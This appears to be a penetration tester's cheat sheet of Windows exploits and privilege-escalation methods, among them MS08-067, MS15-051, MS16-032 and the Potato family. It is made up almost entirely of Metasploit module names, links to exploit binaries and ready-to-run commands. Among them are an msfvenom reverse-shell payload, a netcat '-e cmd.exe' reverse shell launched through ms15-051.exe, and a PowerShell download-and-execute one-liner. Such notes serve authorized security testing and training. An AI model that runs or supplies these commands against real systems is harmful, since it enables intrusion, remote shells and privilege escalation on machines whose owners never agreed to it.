Exploits

Bypass UAC

https://github.com/hfiref0x/UACME

MS08-067

exploit/windows/smb/ms08_067_netapi
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
python MS08_067_2018.py
python MS08_067_2018.py <ip> <scenario_number> <port>

MS15-051

exploit/windows/local/ms15_051_client_copy_image

x32

https://github.com/rootphantomer/exp/blob/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe

x64

https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe

ms15-051.exe "nc <ip> <port> -e cmd.exe"

MS16-032

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

https://gist.github.com/intrd/6dda33f61dca560e6996d01c62203374

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('<url>');Invoke-MS16-032 '-nop -exec bypass -c <command>'

MS16-075

HotPotato - Tater

Start and stop

Import-Module .\Tater.ps1

[press Enter while the script is running]
Stop-Tater

On W7 and W2008 R2
NBNS WPAD Bruteforce + Windows Defender Signature Updates

Invoke-Tater -Trigger 1 -Command "<cmd>"

Using WPAD Bruteforce + Windows Defender Signature Updates and UDP port exhaustion

Invoke-Tater -ExhaustUDP y -Command "<cmd>"

On W10
WebClient Service + Scheduled Task

Invoke-Tater -Trigger 2 -Command "<cmd>"

RottenPotato

exploit/windows/local/ms16_075_reflection

https://github.com/breenmachine/RottenPotatoNG/tree/master/RottenPotatoEXE/x64/Release

JuicyPotato

exploit/windows/local/ms16_075_reflection_juicy
https://github.com/ohpe/juicy-potato/releases
jp.exe -t * -p <rsh.exe> -l <unused_port_like_9001>

ALPC bug

Resources

https://hunter2.gitbook.io/darthsidious/privilege-escalation/alpc-bug-0day

MSF
exploit/windows/local/alpc_taskscheduler
Exploit (09/2018)

Download the zip below:

CFF

The exploit may be patched to work on systems other than W10/W2016, but it works only on x64.

CVE-2019-3567

https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html